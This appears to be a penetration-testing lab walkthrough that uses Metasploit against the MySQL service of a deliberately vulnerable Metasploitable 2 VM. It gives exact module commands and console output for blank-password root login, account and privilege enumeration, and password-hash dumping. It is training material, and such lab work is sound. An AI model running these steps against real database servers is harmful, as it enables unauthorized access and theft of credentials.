MySQL / MariaDB Default Credentials (MySQL Protocol)
MySQL / MariaDB Default Credentials (MySQL Protocol)
Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.
Note 2: this exploit may not work on more recent versions of the Metasploit Framework.
Requirements
Kali Linux
The Kali Linux VM (or any other type of installation)
Metaploitable 2
The Metasploitable 2 VM
Metasploitable Framework
Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP
The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.
Laboratory Workflow
The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.
1. Launch the Metasploit Framework
msfconsole
2. Search for the appropriate module
search mysql_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility
3. Use the module
use auxiliary/scanner/mysql/mysql_login
4. Check the module options
options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
5. Set the appropriate options
set RHOSTS 192.168.8.142
RHOSTS => 192.168.8.142
6. Run the exploit
run
[+] 192.168.8.142:3306 - 192.168.8.142:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.8.142:3306 - 192.168.8.142:3306 - Success: 'root:'
[*] 192.168.8.142:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
7. Run MySQL enumerator to get info from database server
This will enable the collection from the database.
use auxiliary/admin/mysql/mysql_enum
options
Module options (auxiliary/admin/mysql/mysql_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3306 yes The target port (TCP)
USERNAME no The username to authenticate as
set RHOSTS 192.168.8.142
RHOSTS => 192.168.8.142
set USERNAME root
USERNAME => root
run
[*] Running module against 192.168.8.142
[*] 192.168.8.142:3306 - Running MySQL Enumerator...
[*] 192.168.8.142:3306 - Enumerating Parameters
[*] 192.168.8.142:3306 - MySQL Version: 5.0.51a-3ubuntu5
[*] 192.168.8.142:3306 - Compiled for the following OS: debian-linux-gnu
[*] 192.168.8.142:3306 - Architecture: i486
[*] 192.168.8.142:3306 - Server Hostname: metasploitable
[*] 192.168.8.142:3306 - Data Directory: /var/lib/mysql/
[*] 192.168.8.142:3306 - Logging of queries and logins: OFF
[*] 192.168.8.142:3306 - Old Password Hashing Algorithm OFF
[*] 192.168.8.142:3306 - Loading of local files: ON
[*] 192.168.8.142:3306 - Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.8.142:3306 - Allow Use of symlinks for Database Files: YES
[*] 192.168.8.142:3306 - Allow Table Merge: YES
[*] 192.168.8.142:3306 - SSL Connections: Enabled
[*] 192.168.8.142:3306 - SSL CA Certificate: /etc/mysql/cacert.pem
[*] 192.168.8.142:3306 - SSL Key: /etc/mysql/server-key.pem
[*] 192.168.8.142:3306 - SSL Certificate: /etc/mysql/server-cert.pem
[*] 192.168.8.142:3306 - Enumerating Accounts:
[*] 192.168.8.142:3306 - List of Accounts with Password Hashes:
[+] 192.168.8.142:3306 - User: debian-sys-maint Host: Password Hash:
[+] 192.168.8.142:3306 - User: root Host: % Password Hash:
[+] 192.168.8.142:3306 - User: guest Host: % Password Hash:
[*] 192.168.8.142:3306 - The following users have GRANT Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have CREATE USER Privilege:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have RELOAD Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have SHUTDOWN Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have SUPER Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have FILE Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have PROCESS Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following accounts have privileges to the mysql database:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following accounts have empty passwords:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following accounts are not restricted by source:
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - User: root Host: %
[*] Auxiliary module execution completed
8. Dump database schema
This will access and dump the database schema.
use auxiliary/scanner/mysql/mysql_schemadump
options
Module options (auxiliary/scanner/mysql/mysql_schemadump):
Name Current Setting Required Description
---- --------------- -------- -----------
DISPLAY_RESULTS true yes Display the Results to the Screen
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no The username to authenticate as
Try to obtain additional password hashes on the database.
use auxiliary/scanner/mysql/mysql_hashdump
options
Module options (auxiliary/scanner/mysql/mysql_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no The username to authenticate as
set USERNAME root
set RHOSTS 192.168.8.142
run
[+] 192.168.8.142:3306 - Saving HashString as Loot: debian-sys-maint:
[+] 192.168.8.142:3306 - Saving HashString as Loot: root:
[+] 192.168.8.142:3306 - Saving HashString as Loot: guest:
[*] 192.168.8.142:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
10. Run MySQL queries
Try to run SQL queries on the database.
use auxiliary/admin/mysql/mysql_sql
options
Module options (auxiliary/admin/mysql/mysql_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3306 yes The target port (TCP)
SQL select version() yes The SQL to execute.
USERNAME no The username to authenticate as